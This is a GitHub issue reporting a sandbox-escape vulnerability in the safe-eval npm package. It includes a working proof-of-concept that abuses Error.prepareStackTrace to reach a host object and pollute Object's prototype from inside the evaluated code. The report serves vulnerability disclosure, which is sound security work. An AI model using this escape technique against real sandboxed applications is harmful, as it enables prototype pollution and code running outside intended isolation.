We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Hellow, we found sandbox escape vulnerability in the latest version of safe-eval
var safeEval = require('safe-eval') let code = ` (function() { Error.prepareStackTrace = (_, c) => c.map(c => c.getThis()).find(a => a); ret = (new Error()).stack; ret.__proto__.polluted = "ret.__proto__.polluted"; })() ` safeEval(code); const polluted_result = {}["polluted"]; console.log(polluted_result);
The text was updated successfully, but these errors were encountered:
No branches or pull requests
Hellow, we found sandbox escape vulnerability in the latest version of safe-eval
The text was updated successfully, but these errors were encountered: